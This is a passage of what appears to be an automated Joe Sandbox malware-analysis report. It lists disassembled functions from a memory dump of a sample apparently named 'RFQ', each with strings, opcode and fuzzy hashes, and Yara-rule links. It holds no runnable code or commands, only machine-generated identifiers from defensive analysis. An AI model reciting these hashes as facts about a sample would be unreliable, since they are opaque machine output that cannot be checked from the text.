                                                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                        • API String ID: 0-2547482624
                                                                                                        • Opcode ID: ce92ef1e3b5f63ec5e8c7cf6139d843705f8794117111840685cc7f8ac5bca53
                                                                                                        • Instruction ID: 2bc2c8bb538adb975f23d2c8b771a7d261fcc4c6151067162800a14cfbedbf0f
                                                                                                        • Opcode Fuzzy Hash: ce92ef1e3b5f63ec5e8c7cf6139d843705f8794117111840685cc7f8ac5bca53
                                                                                                        • Instruction Fuzzy Hash: A2519B716047429BD725EF79C6407A7BBE4AFC4304F14883EFAAA87281E7B0D545CB92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A3A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 01A3A2FB
                                                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 01A3A309
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                        • API String ID: 0-2876891731
                                                                                                        • Opcode ID: a8623b46680069efa05b0a11082451247357aeadea80b9cfd1a4213e295659ec
                                                                                                        • Instruction ID: 219bad393818f83bdab1cc713bc5cfaeefa6b356f15b9b22faf5938613e74fdb
                                                                                                        • Opcode Fuzzy Hash: a8623b46680069efa05b0a11082451247357aeadea80b9cfd1a4213e295659ec
                                                                                                        • Instruction Fuzzy Hash: CE41A135A04665DBDB15CF69C880B6D7BF4FF85700F184066E944DB291E375D940CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A6A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID: Cleanup Group$Threadpool!
                                                                                                        • API String ID: 2994545307-4008356553
                                                                                                        • Opcode ID: 6373d0d2a873ed6bf9108f6d8b768b8b012bcaff88bbbe9198f11b3ee213d190
                                                                                                        • Instruction ID: 57fb5879e13c091ff70214abbf57359001f3501ffbaa15ae1ddc6e67d1e2072d
                                                                                                        • Opcode Fuzzy Hash: 6373d0d2a873ed6bf9108f6d8b768b8b012bcaff88bbbe9198f11b3ee213d190
                                                                                                        • Instruction Fuzzy Hash: 9201DCB2640740AFD322DF24CE49B2677E8E784B25F048939F658C71D0E334E808CB46
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A3C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: MUI
                                                                                                        • API String ID: 0-1339004836
                                                                                                        • Opcode ID: bb91e810df7f190e42f0fc39ff451a0379b5f6cb258663bf0663c52c6b58a76b
                                                                                                        • Instruction ID: fe7a006f8154ed1c5c1baf6b7f2dbba68887d5d14c9973e5007ae2ebc582a77a
                                                                                                        • Opcode Fuzzy Hash: bb91e810df7f190e42f0fc39ff451a0379b5f6cb258663bf0663c52c6b58a76b
                                                                                                        • Instruction Fuzzy Hash: E3826A75E00218DFEB25CFA9C980BEDBBB5BF88720F14816AE919AB255D7309D41CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01AB6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3916222277
                                                                                                        • Opcode ID: 26b4bf9932a6b83a82efee2f79d32336fefa78785a86938a1d275cc29648a23e
                                                                                                        • Instruction ID: fa584ec1cd75fb6c7f86ef6b0c9470183822cf2cfcb1898ed55da1522d11bf5d
                                                                                                        • Opcode Fuzzy Hash: 26b4bf9932a6b83a82efee2f79d32336fefa78785a86938a1d275cc29648a23e
                                                                                                        • Instruction Fuzzy Hash: F6918372900259AFEB21DFA5CD85FEEBBB8EF58B50F100065F604AB191D774AD04CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01ADE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3916222277
                                                                                                        • Opcode ID: 2f406a0f9a508597b8a9bada5e9512f2439b7417363f95f76f6d31a60a5aa980
                                                                                                        • Instruction ID: ec3c203591a0944ea6a62b07e0e8ede494990395f25d5c9c5f93e89d18efe316
                                                                                                        • Opcode Fuzzy Hash: 2f406a0f9a508597b8a9bada5e9512f2439b7417363f95f76f6d31a60a5aa980
                                                                                                        • Instruction Fuzzy Hash: 2391AE71A00A49AFDF22AFA5DD84FEFBB79EF95740F040029F502AB250DB749901CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A6A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: GlobalTags
                                                                                                        • API String ID: 0-1106856819
                                                                                                        • Opcode ID: f6a95ee0d6e6909b3fc3d23cab39025acb73f80b8c69cc69e803f2d209ad998a
                                                                                                        • Instruction ID: 053789715e241e4e7689af7215bc815d29365e2c7e442e7e123dd69e9226dc22
                                                                                                        • Opcode Fuzzy Hash: f6a95ee0d6e6909b3fc3d23cab39025acb73f80b8c69cc69e803f2d209ad998a
                                                                                                        • Instruction Fuzzy Hash: 24717DB5E0021ADFDF29CF9CD590AADBBB1BF58700F58812EE90AA7241E7359941CF50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01AD4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .mui
                                                                                                        • API String ID: 0-1199573805
                                                                                                        • Opcode ID: 5761176a9104a3daccfd94928a38416901b1565ac8c234eaa0652e20ba742bd8
                                                                                                        • Instruction ID: 3c7e45db47d82252c0afaeb5e960e94c68a9372d25b4946b1402eb3dadddc474
                                                                                                        • Opcode Fuzzy Hash: 5761176a9104a3daccfd94928a38416901b1565ac8c234eaa0652e20ba742bd8
                                                                                                        • Instruction Fuzzy Hash: 3A51A472D0062A9FDF11DF99D940BAEBBB4BF18A10F094129EA12BB650D7349D01CFE5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A4E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: EXT-
                                                                                                        • API String ID: 0-1948896318
                                                                                                        • Opcode ID: aaaa028135f69cb1ff70cba2c3d2246d037080324f4df1e9632784a44543a2be
                                                                                                        • Instruction ID: 5dfab2bb0fd58fee095f923dfd186b4771284ed8f12129585f7b2bb0f0142f3f
                                                                                                        • Opcode Fuzzy Hash: aaaa028135f69cb1ff70cba2c3d2246d037080324f4df1e9632784a44543a2be
                                                                                                        • Instruction Fuzzy Hash: 99416072608352ABD711DB79D980B6BBBE8BFC8724F440D2DFA84D7180E778D9048796
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01AAC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: BinaryHash
                                                                                                        • API String ID: 0-2202222882
                                                                                                        • Opcode ID: c54381e745fbe489812e571d9c53aae65c4e542c7ad901c133c3f7a837297fcf
                                                                                                        • Instruction ID: 0b525d613e1c40900d89654ffbf05699665c76df32e30fabdef12857c046d108
                                                                                                        • Opcode Fuzzy Hash: c54381e745fbe489812e571d9c53aae65c4e542c7ad901c133c3f7a837297fcf
                                                                                                        • Instruction Fuzzy Hash: E44145B1D0012DABEB21DB60CD84FDEB77CBB55724F4045A5EB08AB144DB709E898FA4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01AC6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: #
                                                                                                        • API String ID: 0-1885708031
                                                                                                        • Opcode ID: 1219159d134e60f72c5b50e4ba4bc91c332c95e895dd2680fa303dc49934a272
                                                                                                        • Instruction ID: 17163c4e67f9e6828f9ba17d26d34ca12d37245eda2bd6689e9cdaf6e1a97d8a
                                                                                                        • Opcode Fuzzy Hash: 1219159d134e60f72c5b50e4ba4bc91c332c95e895dd2680fa303dc49934a272
                                                                                                        • Instruction Fuzzy Hash: FC31E331A046199BEB22DF69C850BFE7BB8EF45B04F14402CE959AB382DB75D905CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01AB892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01AB895E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                        • API String ID: 0-702105204
                                                                                                        • Opcode ID: 3bec69069aa92c107f896c777cde5006c8458a846eaf8e296037e20fc90419ce
                                                                                                        • Instruction ID: dcff3c4344f8ffd8e1032c36e7dee53adde0c33c0f64928e4d81a4b3fc0a761e
                                                                                                        • Opcode Fuzzy Hash: 3bec69069aa92c107f896c777cde5006c8458a846eaf8e296037e20fc90419ce
                                                                                                        • Instruction Fuzzy Hash: DB01F7322002A1AFEB355F5ED9C4BE67F6DEF86654B04041CF64587153CB24A845C792
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01AD2000 Relevance: .8, Instructions: 757COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a70716e336d1bb2554f69b13a37a96df1b3580f58cb3ef4583cf2252be1c71c4
                                                                                                        • Instruction ID: f1864db6f34fe6c7112b44c59ce7a1002fb2c9dd7d824831c599028785c78957
                                                                                                        • Opcode Fuzzy Hash: a70716e336d1bb2554f69b13a37a96df1b3580f58cb3ef4583cf2252be1c71c4
                                                                                                        • Instruction Fuzzy Hash: E742D171608B418BE726CF68C991B6FBBE5BF88700F08492EFA8387250D771D945CB52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01AC8158 Relevance: .6, Instructions: 617COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0f93d4cb442f7092e0e0fc65e1845c29c250fb819db3a6f35ee73de00f485333
                                                                                                        • Instruction ID: 28b26288c3ba6018edc9b2dc2815adec98b10a747feb9254708d23c83ae411ca
                                                                                                        • Opcode Fuzzy Hash: 0f93d4cb442f7092e0e0fc65e1845c29c250fb819db3a6f35ee73de00f485333
                                                                                                        • Instruction Fuzzy Hash: 3A425F75E002199FEB25CF69C841BADBBF5BF88700F18819DE949EB242D7389985CF50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A42840 Relevance: .6, Instructions: 605COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 508b8f17759e5d5a9e768ca0313f504372df42bb27484cca8f8d4a75d1e17ba4
                                                                                                        • Instruction ID: 3ee0c6d416b3030c120f71ad1bfb59f43bb0a3485eab3ecfc8300c50b230a88b
                                                                                                        • Opcode Fuzzy Hash: 508b8f17759e5d5a9e768ca0313f504372df42bb27484cca8f8d4a75d1e17ba4
                                                                                                        • Instruction Fuzzy Hash: 6232D274A007558FEF25CF69C9447BEBBF2BF84304F14811DE58A9B285DB35A885CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01ADA118 Relevance: .6, Instructions: 591COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 693510215dac74aeb67a791db9127266ac78ebb1e3b514e50ee63de585f291bf
                                                                                                        • Instruction ID: 97bc0235c1dec91403e4f46256a05e45684b55cd1d247f2817e97a1bbff2e7f8
                                                                                                        • Opcode Fuzzy Hash: 693510215dac74aeb67a791db9127266ac78ebb1e3b514e50ee63de585f291bf
                                                                                                        • Instruction Fuzzy Hash: FC22BD74204E618BEB25CF2DC094772BBF1AF45300F08849AE997CF286E775E592DB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A54A35 Relevance: .4, Instructions: 423COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                        • Instruction ID: ce56c8ef9105c29e90566d30d229a7b3fc766d83098149ed789c67f431a45996
                                                                                                        • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                        • Instruction Fuzzy Hash: C2F15C71E0421A9BDF55CFA9D580BAEBBF5AF48714F098129ED05AB340E774E881CB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01AC892B Relevance: .4, Instructions: 386COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a3874f1b274045e154a5493baf8b3d350e7bdf8e0a3efa6c270fab703d6e1dbe
                                                                                                        • Instruction ID: c9b2b08d1d970f02464d33991c1ed84e6050aa55d883365b2127a1fe97ba6ee6
                                                                                                        • Opcode Fuzzy Hash: a3874f1b274045e154a5493baf8b3d350e7bdf8e0a3efa6c270fab703d6e1dbe
                                                                                                        • Instruction Fuzzy Hash: 85D1FDB1A0060A9BDF15CF68C841AFEBBF1BF88B04F19816DD855E7241E739E9058B60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A365D0 Relevance: .4, Instructions: 383COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: caece917a4b2e834d2c4bbabd2fee88eaf9539a47c5dc3fd8fd9cad8e8404eaa
                                                                                                        • Instruction ID: 7de556d0f2a03b8b03e73b8e349f2c1e3c4f04165c541aba7117aae453cfd05a
                                                                                                        • Opcode Fuzzy Hash: caece917a4b2e834d2c4bbabd2fee88eaf9539a47c5dc3fd8fd9cad8e8404eaa
                                                                                                        • Instruction Fuzzy Hash: F2E17A716083429FC715CF28C590A6ABBE0BFC9314F15896DF99987351EB31EA05CB92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A28397 Relevance: .4, Instructions: 380COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1407f96fe66603e9ddd50459c042fbe033c3067ada09d90a37b024b00745cfd0
                                                                                                        • Instruction ID: 7fdd1a28a25fd29128c0875d721e1bc8296c0d5465ac0a82cf5b9850f4e87618
                                                                                                        • Opcode Fuzzy Hash: 1407f96fe66603e9ddd50459c042fbe033c3067ada09d90a37b024b00745cfd0
                                                                                                        • Instruction Fuzzy Hash: B7D10371A002269BDB14DF6CC990ABA77F5FF54308F08462DF916DB281E738E954CB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01AB8243 Relevance: .3, Instructions: 322COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                        • Instruction ID: 1c18299c762aa02e1961fa71cb590ed377e1b46e2b0effae56793c5615bb5485
                                                                                                        • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                        • Instruction Fuzzy Hash: 20B17F74A00745AFDB24DF9DC980AEBBBBDFF84304F14446DAA1297796DA38E905CB10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A40535 Relevance: .3, Instructions: 300COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                        • Instruction ID: 06167caacea5cc730e198a24a89ee2c977a65bf601ee9310eff540cb99b5af21
                                                                                                        • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                        • Instruction Fuzzy Hash: 3AB107316006469FDF25DB68CA50BBEBBF6EF88300F184555E652D7281D730ED81DB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A383C0 Relevance: .3, Instructions: 281COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 456e4bc2425234520f8c152858a477dd63b9934d450f833818dfd724ccfe64b4
                                                                                                        • Instruction ID: b597e1e1d3f316d7c8ef0a80185fb57ea37cfa6515977c530674bca1c7e839b9
                                                                                                        • Opcode Fuzzy Hash: 456e4bc2425234520f8c152858a477dd63b9934d450f833818dfd724ccfe64b4
                                                                                                        • Instruction Fuzzy Hash: A4C149741083818FDB64CF19C484BABB7E5BF88304F44496DF98987291D778EA49CF92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A2C427 Relevance: .3, Instructions: 280COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d9bdbc032592a61ddab97be304a8b58fc2e1884dc55d4cbb020449e32e3aff22
                                                                                                        • Instruction ID: a20ed503111003a04603cf57fea791ac782f4520551d1b74fb7062dc9a9e29a8
                                                                                                        • Opcode Fuzzy Hash: d9bdbc032592a61ddab97be304a8b58fc2e1884dc55d4cbb020449e32e3aff22
                                                                                                        • Instruction Fuzzy Hash: 13B17070A402668BDB74DF68C990BADB3B5EF44710F0485EAD50AEB245EB70DDC6CB21
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A5E5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ec6e4106c7f8ed36e13713cbd25ad413577e5a76d0c70f310e21a9c8b8df4b82
                                                                                                        • Instruction ID: 99d6f4038d196040610b5e57d57132ad9f26d5a06eaa95c9757408ab03cca884
                                                                                                        • Opcode Fuzzy Hash: ec6e4106c7f8ed36e13713cbd25ad413577e5a76d0c70f310e21a9c8b8df4b82
                                                                                                        • Instruction Fuzzy Hash: 0DA12231E04259AFEF21DF98C944BAEBFF4AF04754F084121EE50AB691D7749E80CB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A70185 Relevance: .3, Instructions: 276COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 646dd38011567310639d63274b635a9ee1a29011a242960a28aa86173ddf9d10
                                                                                                        • Instruction ID: 8845ef24934e709ccea183f4a4f1527fbae11caec15794d95f1b8252594926e2
                                                                                                        • Opcode Fuzzy Hash: 646dd38011567310639d63274b635a9ee1a29011a242960a28aa86173ddf9d10
                                                                                                        • Instruction Fuzzy Hash: 94A1D171B00616DFDB25CF69CA90BAAB7F5FF55318F044029EA45D7282DB34EA05CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01B04500 Relevance: .3, Instructions: 275COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e290be0bc33cb3fdcbaa42ec052614d5adeb3fe749f6890475051fe32b883741
                                                                                                        • Instruction ID: 381f26bfb9ec9b9ef8334accac116647ad428ff1229583074c696d3974c7469f
                                                                                                        • Opcode Fuzzy Hash: e290be0bc33cb3fdcbaa42ec052614d5adeb3fe749f6890475051fe32b883741
                                                                                                        • Instruction Fuzzy Hash: D2A1C172A04611DFC72ADF18C980B6ABBE9FF88704F0509ADF6459B691D334ED05CB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

